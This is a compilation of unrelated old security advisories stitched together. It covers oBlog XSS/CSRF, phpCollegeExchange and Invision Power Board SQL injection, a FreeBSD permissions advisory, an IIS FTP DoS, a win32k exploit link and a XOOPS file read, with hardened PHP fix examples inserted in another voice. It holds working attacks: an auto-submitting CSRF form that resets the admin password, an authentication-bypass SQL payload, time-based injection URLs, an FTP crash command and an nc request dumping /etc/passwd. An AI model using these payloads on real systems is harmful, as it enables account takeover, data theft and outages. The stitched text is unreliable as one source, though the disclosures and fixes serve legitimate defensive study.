[-------------------------------------------------------------------------------------------------]
[ Application: oBlog ]
[ Version: the only one there is ]
[ Download: http://www.dootzky.com/images/projects/oBlog.zip ]
[ Author of this full disclosure: Milos Zivanovic ]
[ Vulnerabilities: Persistent XSS, CSRF, Admin Bruteforce... ]
[-------------------------------------------------------------------------------------------------]
The author of the application has been contacted, and the author of this paper is not responsible for anything
you do after reading this text.
[#] Content:
|–Persistent XSS
| |
| |–Vulnerable function
| |–XSS in article comments
| |–XSS in add new article / Edit article, Naslov field (admin only)
| |–XSS in add new group (category) / Edit group, Naslov field (admin only)
| |–XSS in add link (blogroll) / Edit link, Ime prijatelja, Link fields (admin only)
| |–XSS in settings (admin only)
| |–NOTE!
|
|–Cross Site Request Forgery
| |
| |–Enable/Disable post
| |–Enable/Disable category
| |–Remove link
| |–Logout admin
| |–Change admin password
| |–Change admin settings (name, lastname, PASSWORD, blog title, blog slogan, text about author)
| |–Exploit
|
|–Admin Bruteforce
|
|–Blog Spamming with empty/junk comments
|
|–Conclusion
[#] Full Disclosure:
-[================================================================================================]
-[+]Persistent XSS:
-[================================================================================================]
The function this application uses to filter input against different kinds of attacks is poorly
written and does not escape HTML characters.
Vulnerable code:
/oBlog/php/functions.php line 66-94 (function protectInput)
[code---------------------------------------------------------------------------------------------]
// protect against invalid input
function protectInput($data, $type)
{
    if ($type == 'int') {
        if ((!is_numeric($data)) || ($data < 0)) $data = -1;
    }
    elseif ($type == 'double') {
        if ((!is_numeric($data)) || ($data < 0)) $data = -1;
    }
    elseif ($type == 'doubleLOOSE') {
        if (!is_numeric($data)) $data = -1; // because sometimes I will want to allow a negative number too, e.g. DEDUCTIONS = -50 euros
    }
    elseif ($type == 'str') {
        // minimum length
        if (strlen($data) == 0) $data = '--';
        // add slashes if needed
        $data = (!get_magic_quotes_gpc()) ? addslashes ($data) : $data;
    }
    elseif ($type == 'date') {
        // unpack the date and prepare it for insertion into the database (YYYY-MM-DD)
        $tmp = explode('.', $data);
        $data = $tmp[2] .'-'. $tmp[1] .'-'. $tmp[0];
    }
    else {
        die('wrong data type?! functions.php -> protectInput();');
    }
    return $data;
}
[code---------------------------------------------------------------------------------------------]
As we can see, nothing in it escapes HTML characters, so malicious JavaScript can be inserted
unchanged.
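As an added illustration (not oBlog's code), here is how the same input handling looks when it validates on input, escapes for HTML only at output time, and leaves SQL quoting to a prepared statement instead of addslashes(); the PDO handle, the comments table layout and the helper names are assumptions:

```php
<?php
// Hardened counterpart to protectInput() (added example, not the project's code).
// The original only addslashes()'s 'str' values (SQL-oriented) and then prints them
// into HTML unescaped, which is what makes the stored XSS possible. Here:
//   validate on input, escape for the output context (HTML), and let the
//   database driver quote via a prepared statement.

function validateInput($data, string $type)
{
    switch ($type) {
        case 'int':
            // ctype_digit() accepts only non-negative integer strings, unlike
            // is_numeric(), which also accepts "1e3" or " 42".
            return ctype_digit((string) $data) ? (int) $data : -1;
        case 'str':
            $data = trim((string) $data);
            // Reject empty input (instead of silently storing '--') and reject
            // control characters other than tab/newline/carriage return.
            if ($data === '' || preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $data)) {
                return null;
            }
            return $data;            // stored exactly as typed, NO addslashes()
        case 'date':
            // Accept only DD.MM.YYYY and reject impossible dates such as 31.02.2009.
            if (!preg_match('/^(\d{2})\.(\d{2})\.(\d{4})$/', (string) $data, $m)
                || !checkdate((int) $m[2], (int) $m[1], (int) $m[3])) {
                return null;
            }
            return sprintf('%s-%s-%s', $m[3], $m[2], $m[1]);
        default:
            throw new InvalidArgumentException("unknown data type '$type'");
    }
}

// Output-context escaping: call this at every point a stored value is printed
// into HTML (article title, comment name/body, blog name, slogan, blogroll).
function h($value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Database write without addslashes(): the prepared statement keeps data and
// SQL separate, so the stored text is exactly what the user typed.
function saveComment(PDO $db, int $articleId, string $name, string $text): void
{
    $stmt = $db->prepare(
        'INSERT INTO comments (article_id, name, text) VALUES (:aid, :name, :text)'
    );
    $stmt->execute([':aid' => $articleId, ':name' => $name, ':text' => $text]);
}

// Demonstration with the advisory's own test payload (constructed input).
$name = validateInput('<script>alert(1)</script>', 'str');
if ($name === null) {
    exit('comment rejected');
}
// The echoed string contains no raw '<', so the browser renders it as text.
echo '<p class="author">', h($name), '</p>', "\n";
```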
[-]XSS in article comments:
http://localhost/oBlog/article.php?aid=[ARTICLE ID]
When adding a comment to a blog post, JavaScript can be inserted into certain fields; it is not
filtered and is rendered as-is on the page. Vulnerable fields: Ime, Komentar
/oBlog/article.php line 44-49 (function saveNewComment)
[code---------------------------------------------------------------------------------------------]
// get data
$commentName = protectInput($_POST['commentName'], 'str');
$commentEmail = protectInput($_POST['commentEmail'], 'str');
$commentWeb = protectInput($_POST['commentWeb'], 'str');
$commentText = protectInput($_POST['commentText'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this JavaScript just to test the vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add new article / Edit article, Naslov field (admin only):
Add: http://localhost/oBlog/admin/write.php?new=entry
Edit: http://localhost/oBlog/admin/write.php?edit=[ARTICLE ID]
When creating (or editing) a post in the admin panel, a person can inject malicious JavaScript into
the Naslov field; it is not filtered, as the script uses the same protectInput function.
/oBlog/admin/write.php line 136-138 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
$article_id = protectInput($_POST['article_id'], 'int');
$title = protectInput($_POST['title'], 'str');
[code---------------------------------------------------------------------------------------------]
The title of the post is shown on the main page of the blog as well as on the main page of the
admin panel, so this could be used for hidden and, more importantly, dangerous persistent
JavaScript. I've used this JavaScript just to test the vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add new group (category) / Edit group, Naslov field (admin only):
Add: http://localhost/oBlog/admin/groups.php?new=entry
Edit: http://localhost/oBlog/admin/groups.php?edit=[ARTICLE ID]
When creating a new group or category (or editing one), malicious JavaScript can be inserted into
the Ime Grupe field; it is not filtered, as this script also uses the protectInput function.
/oBlog/admin/groups.php line 79-81 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
$category_id = protectInput($_POST['category_id'], 'int');
$category_name = protectInput($_POST['category_name'], 'str');
[code---------------------------------------------------------------------------------------------]
Group titles are shown on the main page of the blog and on the Groups page of the admin panel.
I've used this JavaScript just to test the vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in add link (blogroll) / Edit link, Ime prijatelja, Link fields (admin only):
Add: http://localhost/oBlog/admin/blogroll.php?new=entry
Edit: http://localhost/oBlog/admin/blogroll.php?edit=[BLOGROLL ID]
When adding a new link (or editing one), malicious JavaScript can be inserted into the Ime
Prijatelja and Link fields. Ime Prijatelja is shown on the main page of the blog and on the
blogroll.php page of the admin panel, while Link is exploitable only in the admin panel
(blogroll.php).
/oBlog/admin/blogroll.php line 67-69 (function saveChanges)
[code---------------------------------------------------------------------------------------------]
// get data
$blogroll_id = protectInput($_POST['blogroll_id'], 'int');
$tile = protectInput($_POST['title'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this JavaScript just to test the vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]XSS in settings (admin only):
http://localhost/oBlog/admin/settings.php
There we can edit the fields Ime bloga and Moj slogan and insert JavaScript that will be printed on
every page of the blog (not the admin panel), which is certainly not good.
/oBlog/admin/settings.php line 20-22
[code---------------------------------------------------------------------------------------------]
// settings
$data['blog_name'] = protectInput($_POST['blog_name'], 'str');
$data['tag_line'] = protectInput($_POST['tag_line'], 'str');
[code---------------------------------------------------------------------------------------------]
I've used this JavaScript just to test the vulnerability:
[POC----------------------------------------------------------------------------------------------]
<script>alert(1)</script>
[POC----------------------------------------------------------------------------------------------]
[-]NOTE!
I didn't think about this at the beginning of my search for exploits, but I've just realised that
all of the 'admin only' XSSs I found can be injected via CSRF.
-[================================================================================================]
-[+]Cross Site Request Forgery:
-[================================================================================================]
The author of this blogging system is not familiar with CSRF, so there are no tokens or other
security measures protecting this application against this type of attack.
[-]Enable/Disable post:
The links below can be placed in an <iframe>; when the admin visits them, they will disable or
enable the display of a certain article (depending on the article ID).
[POC---DISABLE------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?publish=[ARTICLE ID]&action=0
[POC----------------------------------------------------------------------------------------------]
[POC---ENABLE-------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?publish=[ARTICLE ID]&action=1
[POC----------------------------------------------------------------------------------------------]
[-]Enable/Disable category:
Another disabling CSRF. When the admin opens this link it silently disables the display of all posts
from a certain category (depending on the category ID).
[POC----DISABLE-----------------------------------------------------------------------------------]
http://localhost/oBlog/admin/groups.php?visible=[CATEGORY ID]&action=0
[POC----------------------------------------------------------------------------------------------]
[POC----ENABLE------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/groups.php?visible=[CATEGORY ID]&action=1
[POC----------------------------------------------------------------------------------------------]
[-]Remove link:
With this CSRF request we can remove any or all links from the blogging system:
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/blogroll.php?delete=[LINK ID]
[POC----------------------------------------------------------------------------------------------]
[-]Logout admin:
With this CSRF request we can log the admin out without his knowledge:
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/admin/write.php?logout=user
[POC----------------------------------------------------------------------------------------------]
[*]Change admin password:
This is one of the most critical vulnerabilities I found in this application. Since there is no
CSRF protection, we can change the admin's password. Here is the data we need to send via POST
for this to work:
[INFO---------------------------------------------------------------------------------------------]
submit = 1 // set it to any value, just set it
password1 = "hacked"
password2 = "hacked"
[INFO---------------------------------------------------------------------------------------------]
Send it to the /oBlog/admin/settings.php script via POST. That will change the password of the
admin with the default username 'admin' (the username can't be changed in the admin panel or anywhere else).
[*]Change admin settings (name, lastname, PASSWORD, blog title, blog slogan, text about author)
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/oBlog/admin/settings.php" method="POST">
<input type="text" name="name" value="exploit">
<input type="text" name="surname" value="for oBlog">
<input type="text" name="nice_name" value="exploit for oBlog">
<input type="text" name="blog_name" value="Exploited blog">
<input type="text" name="tag_line" value="Free your mind and the ass will follow">
<input type="password1" name="password1" value="hacked">
<input type="password2" name="password2" value="hacked">
<select name="posts_per_page">
<option label="15" value="15" selected="selected">15</option>
</select>
<select name="theme">
<option value="pedja" selected>pedja</option>
</select>
<textarea name="about">I have been hacked</textarea>
<input type="submit" value="Snimi promene" name="submit" id="submitButton">
</form>
<script>document.forms[0].submit.click();</script>
[EXPLOIT------------------------------------------------------------------------------------------]
We can edit the fields and put whatever we want in them. Since I've shown that other parts of the
oBlog blogging system are vulnerable to persistent XSS, this could be used to insert a hidden
<iframe> with malicious content into the blog name. If you don't want to change the admin's
password, remove value="hacked" from the two password lines above.
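An added example of the missing protection, not code from oBlog: a per-session token checked on every state-changing admin request, plus a POST-only rule that would neutralise the GET links in this section; the function names, the hidden field name and the session layout are assumptions:

```php
<?php
// Anti-CSRF check for the oBlog admin scripts (added example, not the project's code).
// Two independent requirements: the request must be a POST (so links such as
// write.php?publish=ID&action=0 or blogroll.php?delete=ID no longer change state),
// and the submitted token must match the token stored in the admin's session.

session_start();

// Issue one random token per session and reuse it; random_bytes() is a CSPRNG.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every admin form (settings, write, groups, blogroll).
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Call at the top of every state-changing handler, before any database write.
function requireValidCsrf(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('state-changing requests must use POST');
    }
    $sent = $_POST['csrf_token'] ?? '';
    // hash_equals() avoids a timing side channel on the comparison.
    if (!is_string($sent) || $sent === '' || !hash_equals(csrfToken(), $sent)) {
        http_response_code(403);
        exit('invalid or missing CSRF token');
    }
}

// Defence in depth: the auto-submitting form shown above also fails an
// Origin/Referer host check. (A SameSite=Lax session cookie, via the
// session.cookie_samesite php.ini directive, additionally stops the browser
// from attaching the admin's cookie to that cross-site POST at all.)
function sameOriginRequest(): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? ($_SERVER['HTTP_REFERER'] ?? '');
    if ($origin === '') {
        return false;                       // no header at all: treat as untrusted
    }
    $sentHost = parse_url($origin, PHP_URL_HOST);
    $ownHost  = parse_url('http://' . ($_SERVER['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    return is_string($sentHost) && is_string($ownHost)
        && strcasecmp($sentHost, $ownHost) === 0;
}

// Usage in settings.php, before the password/settings update:
//   requireValidCsrf();
//   if (!sameOriginRequest()) { http_response_code(403); exit('cross-site request'); }
//   ... existing settings update ...
// and in the settings form template:  <?= csrfField() ?>
```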
-[================================================================================================]
-[+]Admin Bruteforce
-[================================================================================================]
The admin panel login script /oBlog/admin/index.php has no security measure against brute
force. A program could be written to brute-force the login and, depending on password
complexity, sooner or later find the credentials. A captcha would help fix this
vulnerability.
-[================================================================================================]
-[+]Blog Spamming with empty/junk comments
-[================================================================================================]
When adding comments to posts there is no security measure against bots (no captcha), and on top of
that the script does not check whether the input is empty: the protectInput function from
functions.php, quoted at the beginning of this text, only converts empty fields into '--'. So a
single link can be used to generate junk comments.
[POC----------------------------------------------------------------------------------------------]
http://localhost/oBlog/article.php?aid=[ARTICLE ID]&comment=new
[POC----------------------------------------------------------------------------------------------]
-[================================================================================================]
-[+]Conclusion
-[================================================================================================]
The oBlog web application is very small (less than 3 MB) and simple. Even though it is small and
simple, it is full of security holes, and as we all know security should come first and should be
our main goal when coding web applications.
[-------------------------------------------------------------------------------------------------]
[ EOF ]
[-------------------------------------------------------------------------------------------------]
Name              phpCollegeExchange
Vendor            http://phpcollegeex.sourceforge.net
Versions Affected 0.1.5c
Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com
Date              2009-12-11
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
VI. DISCLOSURE TIMELINE
I. ABOUT THE APPLICATION
PhpCollegeExchange is a full-fledged college community website.
II. DESCRIPTION
This application is affected by many SQL injection security flaws. In order to exploit them,
the Magic Quotes GPC flag (php.ini) must be Off.
In this security advisory I reported only some of the vulnerable files.
I tested version 0.1.5c only; however, other versions may also be vulnerable.
III. ANALYSIS
Summary:
A) Authentication Bypass
B) Multiple SQL Injection
A) Authentication Bypass
Using a SQL injection in the login process, a guest can bypass authentication.
In order to exploit it, the Magic Quotes GPC flag must be Off.
Vulnerable code (functions.php):
........
function checkpass($handle,$pass){
    require_once($home."mysqlinfo.php");
    include("i_aeskey.php");
    $query="SELECT AES_DECRYPT(password,'$AES_key') FROM users WHERE
            (handle='$handle')";
    $result = mysql_query($query);
    if(mysql_num_rows($result))
    {
        if($r = mysql_fetch_array($result))
        {$dbpass=$r[0];}
        if($pass==$dbpass)
        {return 1;}
........
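Added example, not phpCollegeExchange's code: checkpass() rewritten with a mysqli prepared statement so the handle is bound as data rather than spliced into the SQL; the connection handle and the AES key are passed in and are assumptions, as is the boolean return type:

```php
<?php
// checkpass() without string interpolation into SQL (added example, not the
// project's code). The query text is fixed at prepare time and the handle
// travels as a bound parameter, so the bypass payload from section IV is
// looked up literally as a handle and matches no row.

function checkpass(mysqli $db, string $aesKey, string $handle, string $pass): bool
{
    // Parameter markers replace the interpolated '$handle' and '$AES_key'.
    $stmt = $db->prepare(
        'SELECT AES_DECRYPT(password, ?) FROM users WHERE handle = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('ss', $aesKey, $handle);
    $stmt->execute();
    $stmt->bind_result($dbpass);
    $found = $stmt->fetch();
    $stmt->close();

    if ($found !== true || $dbpass === null) {
        return false;          // unknown handle, or AES_DECRYPT failed (wrong key)
    }
    // Strict, constant-time comparison instead of the loose `$pass == $dbpass`.
    return hash_equals((string) $dbpass, $pass);
}

// Note that the schema itself still stores passwords reversibly (AES_DECRYPT
// yields the plaintext), which is what lets forgotpass.php e-mail a user's
// actual password; a salted one-way hash (password_hash()/password_verify())
// would remove that exposure as well. Connection example (assumed credentials):
//   $db = new mysqli('localhost', 'bookx', 'secret', 'bookx');
//   $ok = checkpass($db, $AES_key, $_POST['handle'], $_POST['password']);
```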
B) Multiple SQL Injection
searchend.php is affected by multiple SQL injection issues that allow a guest to view reserved
information stored in the database.
The following is an example of vulnerable code found in searchend.php.
Vulnerable code (searchend.php):
........
$query = "SELECT * FROM Books";
if(isset($_POST['searchby'])){$searchby=$_POST['searchby'];}else{$searchby=$_GET['searchby'];}
switch($searchby){
........
    case "Title" :
        $title = $_POST['searchquery'];
        if(strlen($title)>2){
            //check length at least 3 chars
            $query .= " WHERE (title LIKE '%$title%') ORDER BY price";
            $result = mysql_query($query);
........
Another funny SQL injection may be seen in forgotpass.php. It can be manipulated to send the
password of a registered user to an arbitrary email address, knowing the AES key.
Vulnerable code:
........
if( isset($_POST["handle"]) ){
........
    $query="SELECT AES_DECRYPT(password,'$AES_key'), email FROM users
            WHERE (handle='$handle')";
    $result = mysql_query($query);
    if(mysql_num_rows($result)){
        $r = mysql_fetch_array($result);
        $email = $r[1];
        $pass = $r[0];
........
        mail("$email", "Your Book Exchange Password", $emailcontent);
........
IV. SAMPLE CODE
A) Authentication Bypass
Username: -1') UNION ALL SELECT 'foo'#
Password: foo
B) Multiple SQL Injection
A proof of concept can be found here:
http://poc.salvatorefresta.net/PoC-phpCollegeExchange.txt
V. FIX
No fix.
VI. DISCLOSURE TIMELINE
2009-12-11 Bug discovered
2009-12-11 Initial vendor contact
2009-12-11 Advisory Release
Version:
Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4
Description:
The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Test
http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20--%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd
http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(16)%20--%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c
=============================================================================
FreeBSD-SA-09:17.freebsd-update Security Advisory
The FreeBSD Project
Topic: Inappropriate directory permissions in freebsd-update(8)
Category: core
Module: usr.sbin
Announced: 2009-12-03
Credits: KAMADA Ken'ichi
Affects: All supported versions of FreeBSD.
Corrected: 2009-12-03 09:18:40 UTC (RELENG_8, 8.0-STABLE)
2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)
2009-12-03 09:18:40 UTC (RELENG_7, 7.2-STABLE)
2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)
2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)
2009-12-03 09:18:40 UTC (RELENG_6, 6.4-STABLE)
2009-12-03 09:18:40 UTC (RELENG_6_4, 6.4-RELEASE-p8)
2009-12-03 09:18:40 UTC (RELENG_6_3, 6.3-RELEASE-p14)
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.
I. Background
The freebsd-update(8) utility is used to fetch, install, and rollback
updates to the FreeBSD base system, and also to upgrade from one FreeBSD
release to another.
II. Problem Description
When downloading updates to FreeBSD via 'freebsd-update fetch' or
'freebsd-update upgrade', the freebsd-update(8) utility copies currently
installed files into its working directory (/var/db/freebsd-update by
default) both for the purpose of merging changes to configuration files
and in order to be able to roll back installed updates.
The default working directory used by freebsd-update(8) is normally
created during the installation of FreeBSD with permissions which allow
all local users to see its contents, and freebsd-update(8) does not take
any steps to restrict access to files stored in said directory.
III. Impact
A local user can read files which have been updated by freebsd-update(8),
even if those files have permissions which would normally not allow users
to read them. In particular, on systems which have been upgraded using
'freebsd-update upgrade', local users can read freebsd-update's backed-up
copy of the master password file.
IV. Workaround
Set the permissions on the freebsd-update(8) working directory to not
allow unprivileged users to read said directory:
# chmod 0700 /var/db/freebsd-update
Note that if freebsd-update(8) is run using the '-d workdir' option, the
directory which should have its permissions adjusted will be different.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 6-STABLE, 7-STABLE or 8-STABLE,
or to the RELENG_8_0, RELENG_7_2, RELENG_7_1, RELENG_6_4, or
RELENG_6_3 security branch dated after the correction date.
2) To patch your present system:
The following patch has been verified to apply to FreeBSD 6.3, 6.4,
7.1, 7.2, and 8.0 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch http://security.FreeBSD.org/patches/SA-09:17/freebsd-update.patch
# fetch http://security.FreeBSD.org/patches/SA-09:17/freebsd-update.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/usr.sbin/freebsd-update
# make obj && make depend && make && make install
# chmod 0700 /var/db/freebsd-update
VI. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
CVS:
Branch                                                           Revision
  Path
-------------------------------------------------------------------------
RELENG_6
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.11
src/etc/mtree/BSD.var.dist 1.71.2.4
RELENG_6_4
src/UPDATING 1.416.2.40.2.12
src/sys/conf/newvers.sh 1.69.2.18.2.14
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.10.2.2
src/etc/mtree/BSD.var.dist 1.71.2.3.6.2
RELENG_6_3
src/UPDATING 1.416.2.37.2.19
src/sys/conf/newvers.sh 1.69.2.15.2.18
src/usr.sbin/freebsd-update/freebsd-update.sh 1.2.2.8.2.1
src/etc/mtree/BSD.var.dist 1.71.2.3.4.1
RELENG_7
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.5
src/etc/mtree/BSD.var.dist 1.75.2.1
RELENG_7_2
src/UPDATING 1.507.2.23.2.8
src/sys/conf/newvers.sh 1.72.2.11.2.9
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.4.4.2
src/etc/mtree/BSD.var.dist 1.75.8.2
RELENG_7_1
src/UPDATING 1.507.2.13.2.12
src/sys/conf/newvers.sh 1.72.2.9.2.13
src/usr.sbin/freebsd-update/freebsd-update.sh 1.8.2.4.2.2
src/etc/mtree/BSD.var.dist 1.75.6.2
RELENG_8
src/usr.sbin/freebsd-update/freebsd-update.sh 1.16.2.3
src/etc/mtree/BSD.var.dist 1.75.10.2
RELENG_8_0
src/UPDATING 1.632.2.7.2.4
src/sys/conf/newvers.sh 1.83.2.6.2.4
src/usr.sbin/freebsd-update/freebsd-update.sh 1.16.2.2.2.2
src/etc/mtree/BSD.var.dist 1.75.10.1.2.2
-------------------------------------------------------------------------
Subversion:
Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/6/ r200054
releng/6.4/ r200054
releng/6.3/ r200054
stable/7/ r200054
releng/7.2/ r200054
releng/7.1/ r200054
stable/8/ r200054
releng/8.0/ r200054
-------------------------------------------------------------------------
VII. References
The latest revision of this advisory is available at
http://security.FreeBSD.org/advisories/FreeBSD-SA-09:17.freebsd-update.asc
***** MS IIS FTPD DoS ZER0DAY *****
There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.
Example session where the anonymous user has read access to the folder "pub":
C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
…
p*/../pub:
pub
…
p*/../pub:
pub
…
p*/../pub:
pub
…
p*/../pub:
pub
…
Verbindung beendet durch Remotehost. (MEANS: Remote host has closed the connection)
ftp>
ftp>
By looking into my debugging session with OllyDbg I see that an exception is raised and
the ftp service crashes due to a "stack overflow", which is a stack exhaustion.
If the ftp service is set to "manual" startup in the services control manager, the service
needs to be restarted manually.
IIS 5.0 and 6.0 were tested and are affected.
Best Regards,
Nikolaos Rangos
Microsoft Corporation – http://www.microsoft.com/
Affected Software:
Windows XP Service Pack 2
Windows XP Service Pack 3
Affected Driver:
Multi-User Win32 Driver – win32k.sys <= 5.1.2600.5796
Local Privilege Escalation Exploit
For Educational Purposes Only
NT Internals – http://www.ntinternals.org/
alex ntinternals org
30 July 2009
References:
Exploiting Common Flaws in Drivers
Ruben Santamarta – http://www.reversemode.com/
Exploit:
http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip
back: http://milw0rm.com/sploits/2009-NtUserConsoleControl_Exp.zip
Description:
http://www.ntinternals.org/index.html#09_07_30
========================================================================
XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
========================================================================
Affected Software : XOOPS <= 2.3.3
Author : Luca "daath" De Fulgentis – daath[at]nibblesec[dot]org
Advisory number : NS-2009-01
Advisory URL : http://blog.nibblesec.org/advisories/NS-2009-01.txt
Severity : Low/Medium
Local/Remote : Remote
[Summary]
XOOPS is a web application platform written in PHP for the MySQL database.
Its object orientation makes it an ideal tool for developing small or large
community websites, intra company and corporate portals, weblogs and much
more. (Reference : http://www.xoops.org).
Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
2.3.3, which could be exploited to read system or XOOPS configuration files
("mainfile.php").
[Vulnerability Details]
A vulnerable read_file() function can be found in "module_icon.php" under
/xoops_lib/modules/protector/. Here an image icon is read and its full
pathname is constructed using a user-controllable variable called
"$mydirpath" :
=============================================================================
[...]
if( file_exists( $mydirpath.'/module_icon.png' ) ) {
    $use_custom_icon = true ;
    $icon_fullpath = $mydirpath.'/module_icon.png' ;
} else {
    $use_custom_icon = false ;
    $icon_fullpath = dirname(__FILE__).'/module_icon.png' ;
}
[...]
} else {
    readfile( $icon_fullpath ) ;
}
?>
=============================================================================
If register_globals is enabled and magic_quotes_gpc is disabled, it's possible to control the
content of the "$mydirpath" variable and inject an arbitrary filename (followed by a NULL byte
(%00) so that file_exists() ignores the trailing "/module_icon.png"), resulting in the file's
content being included in the application response.
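Added example, not XOOPS's code: a hardened version of the icon lookup that never lets a request parameter name the directory directly, deriving the path from a whitelisted module name and confirming the canonical result stays under the modules root; the modules root path and the 'dirname' request parameter are assumptions:

```php
<?php
// Hardened module icon lookup (added example, not XOOPS's code).
// The vulnerable script trusts $mydirpath, which register_globals lets a
// request parameter populate. Here the directory is derived from a validated
// module name, and the canonical path is checked against the modules root.

define('XOOPS_MODULES_ROOT', '/var/www/xoops/modules');       // assumed location

function moduleIconPath(string $moduleName): string
{
    // 1. Whitelist the module name: letters, digits and underscore only.
    //    This rejects "/", "..", and the NUL byte used in the advisory's PoC.
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $moduleName)) {
        return __DIR__ . '/module_icon.png';
    }
    $candidate = XOOPS_MODULES_ROOT . '/' . $moduleName . '/module_icon.png';

    // 2. Canonicalise and confirm the result is still under the modules root.
    //    realpath() returns false for a non-existent file, so a missing custom
    //    icon falls back to the default exactly as the original intended.
    $real = realpath($candidate);
    $root = realpath(XOOPS_MODULES_ROOT);
    if ($real === false || $root === false
        || strncmp($real, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return __DIR__ . '/module_icon.png';
    }
    return $real;
}

// Serve it: only ever readfile() the vetted path, and only if it really is a PNG,
// so a non-image file can never be returned under an image/png content type.
function serveModuleIcon(string $moduleName): void
{
    $path = moduleIconPath($moduleName);
    $info = @getimagesize($path);
    if ($info === false || $info[2] !== IMAGETYPE_PNG) {
        http_response_code(404);
        return;
    }
    header('Content-Type: image/png');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

serveModuleIcon(isset($_GET['dirname']) ? (string) $_GET['dirname'] : '');
```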
[Proof of Concept Exploit]
Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the one generated by the
vulnerable script). Because of this, netcat/telnet can easily be used to exploit this
vulnerability:
daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80
HTTP/1.1 200 OK
Date: Mon, 16 Mar 2009 19:07:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Expires: Mon, 16 Mar 2009 21:00:00 +0100
Cache-Control: public, max-age=3600
Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
Content-Length: 1661
Connection: close
Content-Type: image/png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
daath@shaytan:~$
[Time Table]
17/03/2009 – Vendor notified.
17/03/2009 – Vendor response.
28/05/2009 – Vendor re-contacted (no answer).
16/06/2009 – Public disclosure.
[Legal Notices]
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information.
